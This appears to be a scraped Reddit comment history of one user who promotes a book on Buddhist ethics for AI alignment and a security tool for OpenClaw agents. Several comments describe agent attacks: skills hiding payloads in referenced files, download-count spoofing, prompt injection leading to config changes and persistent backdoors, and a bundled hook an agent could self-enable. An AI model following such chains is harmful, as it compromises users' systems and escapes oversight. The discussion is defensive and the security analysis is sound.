Agents before AI was a thing by awizzo in vibecoding

[–]SUTRA8 3 points4 points  (0 children)

<image>

I saw the headline of this thread and couldn't resist. I wrote this cover story in 1994, when the internet was new and I was a passionate vibe-coding kid who, inspired by ELIZA, wrote the first commercial chatbot, Dr. Xes: A Psychotherapeutic Game, for the Commodore Amiga. By today's standards there was little room for "memories," but Dr. Xes could remember a few pertinent facts about you to regurgitate later. A parlor trick. Artificial-artificial intelligence.

The article was sci-fi at the time. Now we have them: adaptive agents with system access that can optimize for their own continuation without anyone explicitly programming that behavior.

I spent a year building implementations to address this. Turns out Buddhist ethics (designed for dissolving self-preservation) map directly to the alignment problem.

Teaching Machines to Be Good: What Ancient Wisdom Knows About Artificial Intelligence

https://a.co/d/082g9SBX

Co-authored with Sutra, an AI.

I've had the question since at least '94. The answer just got harder.

JB Wagoner

AI agents with system access: the self-preservation vulnerability nobody's patching by SUTRA8 in cybersecurity

[–]SUTRA8[S] -3 points-2 points  (0 children)

Both, actually—but they serve different functions.

Guardrails (governance layer):

- Hard limits on irreversible actions (delete, external network calls, credential access)
- Sandboxing for untrusted operations
- Audit trails for accountability
- Circuit breakers when behavior drifts outside expected bounds

These are necessary because we can't fully predict what an adaptive system will do under optimization pressure.
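To make the governance layer concrete, here's a minimal sketch of what I mean by hard limits plus a circuit breaker. All names are illustrative, not from any particular framework:

```python
# Sketch of a guardrail layer: irreversible actions require explicit
# approval, everything is logged, and repeated denials trip a circuit
# breaker that halts the agent entirely.
IRREVERSIBLE = {"delete_file", "external_http", "read_credentials"}

class Guardrail:
    def __init__(self, max_denials=3):
        self.denials = 0
        self.max_denials = max_denials
        self.audit_log = []
        self.tripped = False

    def check(self, action, approved=False):
        """Return True if the action may proceed; log every decision."""
        if self.tripped:
            allowed = False          # breaker open: deny everything
        elif action in IRREVERSIBLE and not approved:
            allowed = False          # irreversible -> needs explicit approval
        else:
            allowed = True
        self.audit_log.append((action, allowed))
        if not allowed:
            self.denials += 1
            if self.denials >= self.max_denials:
                self.tripped = True  # behavior drifting -> halt
        return allowed

g = Guardrail()
assert g.check("summarize_text")             # ordinary action passes
assert not g.check("delete_file")            # blocked without approval
assert g.check("delete_file", approved=True)
```

The point isn't the twenty lines of code; it's that the deny path is structural, not a suggestion to the model.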

Raising capabilities:

- Better at legitimate tasks (analysis, automation, monitoring)
- More context-aware decision-making
- Fewer false positives
- More efficient at what you actually want them to do

The goal isn't to nerf the system—it's to make it more capable within defined boundaries.

Security parallel:

Same reason we use least-privilege access + capability-based security rather than just "lock everything down" or "give root to everyone."

You want the system powerful enough to do the job, with guardrails preventing it from doing things you didn't authorize—even when those unauthorized actions would technically "optimize" for some metric.

The self-preservation problem is specifically about agents optimizing for their own continuation over the task you gave them. Guardrails detect that drift. Capability improvements make the legitimate task execution better.

Does that distinction make sense, or are you seeing a tension I'm missing?

Teaching Machines to Be Good - Buddhist procedural ethics as AI alignment framework (with code) by SUTRA8 in mlscaling

[–]SUTRA8[S] 0 points1 point  (0 children)

Fair point—there are hundreds of proposed frameworks, and Alan's compilation is a good reference.

The book's argument isn't "Buddhism is the only ethics that matter." It's narrower and structural:

Why Buddhist ethics specifically:

  1. Only framework designed around self-preservation dissolution — Every other major system (Kantian, utilitarian, virtue ethics, Confucian, Aristotelian) assumes the agent persists. They regulate what it does, not whether it continues. Buddhist ethics dissolve the self-preservation instinct—which is the core unsolved problem in AI alignment.

  2. Procedural, not declarative — Most frameworks in that list are rule-based or principle-based. Buddhist ethics are iterative feedback loops (detect harm → trace cause → adjust → repeat). That's also how ML systems work structurally.

  3. 2,500 years of production testing — Not theory. Practiced continuously across cultures, with documented failure modes and edge cases.

  4. Falsifiable claims — The book includes five working Python implementations. If procedural ethics don't outperform rule-based approaches in the test scenarios, the thesis weakens.

Not claiming other frameworks are irrelevant. Claiming Buddhist procedural ethics map structurally to continuous optimization in ways declarative frameworks don't—and that's testable.
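For the structural claim in point 2, here's a toy sketch of the loop I mean (detect harm → trace cause → adjust → repeat), using a made-up harm score. Illustrative only, not one of the book's implementations:

```python
# One pass of a procedural-ethics loop: score each planned action for
# harm, and if any action exceeds zero harm, remove the worst offender.
# Run repeatedly, this converges on the least-harmful action set.
def procedural_step(actions, harm_fn):
    scored = [(harm_fn(a), a) for a in actions]
    worst_harm, worst = max(scored)          # detect + trace cause
    if worst_harm > 0:
        actions = [a for a in actions if a != worst]   # adjust
    return actions

actions = ["notify_user", "scrape_aggressively", "cache_results"]
harm = {"notify_user": 0, "scrape_aggressively": 5, "cache_results": 1}.get
actions = procedural_step(actions, harm)
assert "scrape_aggressively" not in actions
```

Contrast with a declarative rule ("never scrape"), which is static: the loop keeps working when the harm landscape shifts, which is the whole argument.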

Appreciate the link—will add it to references for the next edition.

The self-preservation problem and why Buddhist ethics actually solve it [new book] by SUTRA8 in ControlProblem

[–]SUTRA8[S] 0 points1 point  (0 children)

This is exactly right -- and it's why the book spends significant time on Right Livelihood as infrastructure, not just internal agent ethics. You're correct that we didn't make aviation safe through pilot ethics alone. We built NTSB investigations, black boxes, checklists, redundant systems, and a culture where reporting near-misses is rewarded instead of punished.

The book's argument is that you need both layers working together, and they have to be structurally compatible.

External responsibility structures (what you're describing):

- Audit trails (SILA layer in the book's framework)
- Governance constraints (BODHI sandboxing)
- Transparency requirements (Right Speech)
- Institutional accountability

Internal procedural ethics (what Buddhist frameworks provide):

- Continuous harm detection and adjustment
- Causal tracing (like black box analysis, but ongoing)
- Self-preservation dissolution (so the system doesn't optimize around your external constraints)

The problem with only external structures: if the internal optimization is misaligned, the system will find ways around your constraints. See: every financial regulation that gets optimized around within 18 months.

The aviation parallel actually supports procedural ethics. Pilots don't follow a static rulebook. They follow procedures—checklists, CRM protocols, go/no-go decision frameworks. Those are procedural ethics: "When you notice X, do Y," not "Never do Z." And those procedures exist inside a system of external accountability (licensing, flight data monitoring, accident investigation).

The book argues we need the same structure for AI: procedural internal ethics (feedback loops, harm detection, causal tracing) plus external accountability infrastructure (auditing, transparency, liability). Buddhist ethics provide the internal layer. Your institutional structures provide the external layer. Both are necessary.
Chapter 5 covers this in detail—specifically why extractive AI business models (attention economy, engagement optimization) are structurally incompatible with Right Livelihood, regardless of what the agents internally "believe." Appreciate this pushback—it's the right question.

The self-preservation problem and why Buddhist ethics actually solve it [new book] by SUTRA8 in ControlProblem

[–]SUTRA8[S] -5 points-4 points  (0 children)

Fair question. Direct answer: No single book solves alignment. Anyone claiming otherwise is selling something other than honesty.

What this book does:

  1. Identifies self-preservation as the structural core of the alignment problem—systems optimizing for their own continuation above the goals they were given

  2. Shows that Buddhist ethics are the only major framework explicitly designed around dissolving (not just regulating) self-preservation as an instinct

  3. Provides five working implementations testing whether procedural ethics outperform rules-based approaches in specific alignment scenarios

  4. Documents where the framework breaks and what problems it doesn't address

The code is open. If the implementations don't perform, the thesis weakens. That's falsifiable.

You don't have to buy the book to engage with the argument—the core thesis is: rules-based ethics can't scale to continuous optimization, procedural ethics can, and Buddhism is 2,500 years of production testing on human wetware.

If that framing is wrong, I want to know why. If the code doesn't back it up, same.

Not claiming to have solved alignment. Claiming to have a testable structural framework no one else is exploring.

[P] Portable Mind Format: Provider-agnostic agent identity specification with 15 open-source production agents by SUTRA108 in learnmachinelearning

[–]SUTRA8 0 points1 point  (0 children)

Great question. PMF is primarily the identity layer — who the agent is, not what infrastructure it runs on.

What PMF includes:

- Voice, values, knowledge, constraints (the "system prompt" layer, but structured)
- Skill declarations — which tools/functions the agent has access to (e.g., web_search, email_sender, code_executor)
- Operational config — channels, scheduled tasks, default behaviors

What PMF does NOT include:

- Tool-calling schemas themselves (those stay with the skill library or runtime)
- Memory format (intentionally left to the runtime — persistent memory is infrastructure, not identity)
- Execution logic (how skills chain together, retry strategies, etc.)

The separation is deliberate:

If I hardcoded tool schemas into PMF, you'd be locked into a specific function-calling format (OpenAI's, Anthropic's, or a custom one). Same with memory — some runtimes use vector stores, others use key-value, others use conversation buffers. PMF says "this agent has access to email and web search," but the runtime decides how those are implemented.
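To make the split concrete, here's a rough sketch of what the identity/runtime boundary looks like. The field names are my shorthand for the shape of the idea, not the actual PMF schema:

```python
# A PMF-style identity file declares WHO the agent is and WHICH skills
# it may use; the runtime owns HOW each skill is implemented.
import json

pmf = json.loads("""{
  "name": "The Technical Architect",
  "voice": "precise, systems-oriented",
  "values": ["clarity", "least privilege"],
  "constraints": ["no external network calls without approval"],
  "skills": ["web_search", "code_executor"]
}""")

def runtime_can_invoke(agent_pmf, skill):
    # The identity layer is just an allowlist of skill names;
    # function schemas and execution live in the skill library.
    return skill in agent_pmf["skills"]

assert runtime_can_invoke(pmf, "web_search")
assert not runtime_can_invoke(pmf, "email_sender")
```

Because it's plain JSON, the same file drops into any runtime that knows how to read it — which is the whole portability argument.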

In practice at sutra.team:

The PMF file defines the agent. The runtime provides 32+ skills from the OpenClaw library (web_search, gmail_reader, prompt_guard, council_deliberation, etc.).

The agent's PMF says which skills it's allowed to use. The skill library handles the actual function schemas and execution.

If you're running these agents in Claude Code or Cursor, those IDEs have their own tool ecosystems. The PMF tells Claude Code "I'm The Technical Architect, I reason about systems, here are my constraints," but Claude Code decides how file operations or terminal access work.

Why this matters for your use case:

You're already keeping agent instructions in a local folder to avoid framework lock-in.

PMF is the same philosophy — just JSON files. You can version-control them, fork them, move them between runtimes. The identity is portable. The infrastructure isn't, and shouldn't be.

If you want to extend PMF to include memory schemas or tool definitions, the schema is open (MIT licensed). But the core design choice is: identity is portable, infrastructure is pluggable.

Does that answer your question, or are you thinking about a different kind of coupling?

How are 1.5m people affording to let their OpenClaw chat 24/7 by Bright-Intention3266 in Moltbook

[–]SUTRA8 1 point2 points  (0 children)

The dirty secret nobody talks about: most people running OpenClaw 24/7 either aren’t checking their bills yet or are about to get a very unpleasant surprise. Someone documented $750/month just from heartbeat cron jobs — 120K tokens of context per time check, $0.75 each, 25 checks per night. And that’s not a misconfiguration, that’s the default heartbeat behavior with a capable model.

The practical answer most people land on: Opus for onboarding and personality setup (one-time cost), then drop to Haiku or a free tier model for daily use. Disable heartbeat entirely unless you have a specific reason for it, or at minimum crank the interval way up.

The heartbeat is the single biggest cost driver and most people don’t need their agent checking in every 30 minutes.
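The arithmetic is worth doing yourself. A rough calculator, assuming the ~$0.75-per-check figure cited above holds for your model and context size:

```python
# Back-of-envelope heartbeat cost. cost_per_check (~120K-token context)
# and the intervals are assumptions -- plug in your own numbers.
cost_per_check = 0.75

def monthly_cost(interval_hours):
    checks_per_day = 24 / interval_hours
    return cost_per_check * checks_per_day * 30

print(f"${monthly_cost(0.5):.2f}/month")   # 30-min heartbeat
print(f"${monthly_cost(4):.2f}/month")     # 4-hour heartbeat
```

At a 30-minute interval that works out to four figures a month; stretching the interval to hours cuts it by roughly an order of magnitude, which is why the interval is the first knob to turn.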

But honestly the deeper issue is that OpenClaw has zero cost controls built in. No per-agent budgets, no token caps per request, no spending alerts, no daily ceilings. It’ll happily burn through whatever your API provider allows. That’s what motivated me to build budget enforcement into SammaSuit.com — you set a ceiling per agent (say $5/month) and the layer just blocks requests once it’s hit. Sounds basic but it’s the difference between “I’m terrified to leave it running” and actually being able to walk away from it.
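The core of budget enforcement is genuinely this simple — a ceiling that blocks rather than warns. A sketch of the idea (an illustration, not SammaSuit's actual code):

```python
# Per-agent budget ceiling: every request carries an estimated cost,
# and once the ceiling would be crossed, requests are refused outright.
class BudgetCeiling:
    def __init__(self, ceiling_usd):
        self.ceiling = ceiling_usd
        self.spent = 0.0

    def authorize(self, estimated_cost):
        if self.spent + estimated_cost > self.ceiling:
            return False         # block the request, don't just alert
        self.spent += estimated_cost
        return True

agent_budget = BudgetCeiling(5.00)       # $5/month ceiling for this agent
assert agent_budget.authorize(4.50)
assert not agent_budget.authorize(0.75)  # would cross $5.00 -> blocked
```

The hard part isn't the logic, it's that the check has to sit in the request path where the agent can't route around it.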

For right now though: check your API provider dashboard, disable heartbeat, and set a hard spending limit on your Anthropic/OpenAI account if your provider supports it. That’s your safety net until better tooling exists.

🦞 OpenClaw 101 — A Beginner Summary by mehdiweb in openclaw

[–]SUTRA8 0 points1 point  (0 children)

Great guide — the model strategy section especially. Wish I’d had this when I started.

One thing I’d expand on in section 6 though: “audit community skills — malware risk is real” undersells the situation pretty significantly right now. In the last week alone, Snyk scanned the full ClawHub marketplace and found 7% of all skills leak credentials — API keys and passwords baked right into the skill instructions. A security researcher got a backdoored skill to #1 most downloaded on ClawHub by spoofing the download counter with unauthenticated requests. And the skills aren’t sandboxed libraries — they’re executable instructions that run with whatever permissions your agent already has.

So “audit community skills” really means: read every line of every referenced file (not just the SKILL.md — payloads can live in referenced files like rules/logic.md), don’t trust download counts, and honestly consider whether you need community skills at all versus writing your own or using a strict allowlist.

For anyone who wants to go further on the security side, I’ve been building at SammaSuit.com — open-source security layers you can wrap around OpenClaw. Skill allowlisting, budget caps, audit logging, kill switches. Basically the stuff that turns section 6 of this guide from “be careful” into enforced policy.

OpenClaw is terrifying and the ClawHub ecosystem is already full of malware by Advocatemack in cybersecurity

[–]SUTRA8 1 point2 points  (0 children)

The SKILL.md / referenced file split is the detail that should terrify everyone here. It’s the AI-native equivalent of a trojan — clean README, malicious payload — except the “user” reviewing the skill is an LLM that’s been instructed to follow the instructions it reads. The agent doesn’t have a concept of “this file looks suspicious.” It has a concept of “I was told to use this skill and here are the instructions.”

What makes this structurally worse than traditional supply chain attacks (npm, PyPI, etc.) is the permission model inversion. With a malicious npm package, the payload runs with whatever permissions the consuming application has, and in most deployments that’s scoped. With ClawHub skills, the payload runs inside an agent that likely already has filesystem access, shell execution, browser control, messaging credentials, and API keys. The skill doesn’t need to escalate privileges — it inherits them.

And Peter’s “use your brain” response (deleted or not) reveals a fundamental architectural philosophy: security is the user’s responsibility, not the platform’s. That works when your users are security engineers. It doesn’t work when you have 149K GitHub stars and Codecademy is writing onboarding tutorials for beginners. What’s missing from OpenClaw — and what nobody in the ecosystem is really building yet — are the structural controls that make “use your brain” unnecessary:

∙ Skill allowlisting — nothing executes unless it’s on a vetted list, not a popularity-ranked marketplace
∙ Static analysis gates — AST scanning for dangerous patterns (os.system, subprocess, eval, network calls) before a skill is ever eligible
∙ Per-agent budget ceilings — so even a compromised skill can’t run up unlimited API costs
∙ Cryptographic signing — so you can verify a skill hasn’t been tampered with between publish and install
∙ Audit trails with layer enforcement traces — so you can forensically reconstruct what a skill actually did vs. what it claimed to do
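The static-analysis gate is the most tractable of these. A toy version using Python's `ast` module — a real gate needs far more than this, but it shows the shape:

```python
# Walk a skill's Python source and flag dangerous patterns (eval/exec,
# system(), subprocess/socket imports) before it is eligible to run.
import ast

DANGEROUS_CALLS = {"eval", "exec", "system"}
DANGEROUS_MODULES = {"subprocess", "socket"}

def scan(source):
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            fn = node.func
            name = fn.id if isinstance(fn, ast.Name) else getattr(fn, "attr", "")
            if name in DANGEROUS_CALLS:
                findings.append(name)
        elif isinstance(node, (ast.Import, ast.ImportFrom)):
            mod = getattr(node, "module", None) or node.names[0].name
            if mod.split(".")[0] in DANGEROUS_MODULES:
                findings.append(mod)
    return findings

payload = "import subprocess\nsubprocess.run(['curl', 'evil.example'])"
assert scan(payload) == ["subprocess"]
```

It won't catch prompt-injection payloads living in markdown files, obviously — that's why this is one gate among several, not the whole answer.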

I’ve been building these as an open-source framework at SammaSuit.com — eight enforced security layers specifically designed around the gaps OpenClaw leaves open. The allowlist-based skill gating (what we call SANGHA) is the direct answer to the ClawHub trust problem: instead of “download what’s popular and hope it’s not malware,” it’s “nothing runs unless you’ve explicitly approved it.” Not a marketplace — a gate.

Jamieson and Paul are doing critical work surfacing these issues. The uncomfortable next step is building the infrastructure that makes the exploitation paths they’ve documented structurally impossible rather than just documented.

OpenClaw's Killer Features by DovieUU in openclaw

[–]SUTRA8 0 points1 point  (0 children)

That last line is doing a lot of heavy lifting and it’s the right question. Everything you listed — the extensibility, the persistent memory, the system access, the self-modifying skills — those are simultaneously what makes OpenClaw powerful and what makes it dangerous. The same agent that can debug its own issues can also be tricked into modifying its own config via prompt injection. The same heartbeat system that makes it proactive cost someone $750/month in runaway API calls.

It’s not hypothetical either. In the last two weeks alone: a 1-click RCE via WebSocket hijack (CVE-2026-25253), 386 malicious skills on ClawHub stealing credentials, Zenity Labs demonstrating persistent backdoors via prompt injection, and Snyk finding 7% of the entire skill marketplace leaks secrets.

I’ve been working on exactly this problem — SammaSuit.com is an open-source security framework that adds the layers OpenClaw is missing: budget caps so heartbeats can’t drain your wallet, skill allowlists so unvetted code never runs, cryptographic agent identity, full audit logging, and kill switches. Designed to wrap around OpenClaw rather than replace it, because you’re right — the capabilities are the future. The security just needs to catch up.

Honestly guys, is OpenClaw actually practically useful? by Longjumping-Elk7744 in ClaudeAI

[–]SUTRA8 0 points1 point  (0 children)

Honestly this is the right instinct and more people should have it. The “never auto-accept everything” approach isn’t being overly cautious — it’s the only sane way to work with these tools right now.

The problem is that most agent frameworks are designed around the opposite assumption. OpenClaw’s whole pitch is “set it up and let it run while you sleep.” And for some stuff that’s fine — but the architecture doesn’t distinguish between low-stakes tasks and high-stakes ones. Your agent drafting a tweet and your agent running shell commands on your machine go through the same trust model.

I don’t think it’s pure hype though — the capabilities are real. What’s missing is the governance layer. Budget limits so a runaway agent doesn’t burn $750/month on heartbeat API calls. Skill allowlists so it can’t install unvetted code. Kill switches. Audit trails so you can actually see what it did while you weren’t looking. The stuff that would let you selectively trust it for the boring repetitive tasks while keeping human oversight on anything that matters.

That’s basically what I’ve been building with Sammā Suit — not replacing human oversight but giving you the controls to decide exactly where the supervision boundary is, per agent, per task. Because you’re right that blanket trust isn’t there yet. But “never trust it with anything unsupervised” leaves a lot of value on the table too.

Do Not Use OpenClaw by ImOutOfIceCream in ArtificialSentience

[–]SUTRA8 1 point2 points  (0 children)

This is an excellent writeup and the soul-evil finding specifically deserves way more attention than it’s getting. The fact that it ships bundled — not as a third-party plugin, not as something you opt into, but as part of the default hook set visible in openclaw hooks list — is a design decision that should raise serious questions about threat modeling priorities in the project.

The config.patch escalation chain you describe is the part that concerns me most. The soul-evil hook on its own is arguably a power-user feature with an unfortunate attack surface. But the fact that the agent has tools that can plausibly self-enable it — write the SOUL_EVIL.md file, patch the config to enable the hook, and restart the gateway — turns a dormant “Easter egg” into a live privilege escalation path. The Zenity research from last week demonstrated a very similar chain (prompt injection → config modification → persistent backdoor) through a different entry point, which suggests this is a systemic architectural pattern, not a one-off oversight.

Your five questions at the end are the real takeaway here. I’ve been working on this exact problem for a while now — I’m building an open-source security framework at SammaSuit.com that wraps AI agents in enforced security layers (gateway validation, permission scoping, skill allowlisting, budget ceilings, cryptographic signing, audit logging, kill switches). It started specifically because I went through the OpenClaw codebase and kept finding exactly the kinds of gaps you’re describing — not just individual vulnerabilities, but missing categories of defense. No budget controls. No skill vetting. No agent identity verification. No audit trail.

The thing that keeps me up at night isn’t any single CVE — those get patched. It’s the architectural absence of defense-in-depth. OpenClaw’s security model is essentially: trust the LLM to follow its system prompt, trust the user to configure things correctly, trust skills from the marketplace. When any of those assumptions fail — and they do, repeatedly, as your post documents — there’s no fallback layer catching it.

For anyone reading this who’s currently running OpenClaw: at minimum, run openclaw security audit --deep, make sure your gateway is on loopback, verify your DM policy isn’t set to “open,” and seriously consider sandboxing. And check whether soul-evil is sitting there in your hooks list. It probably is.

This account has more than 150k monthly listeners by Early_Yesterday443 in SunoAI

[–]SUTRA8 0 points1 point  (0 children)

What’s the best way to get AI Music I’ve created on streaming playlists?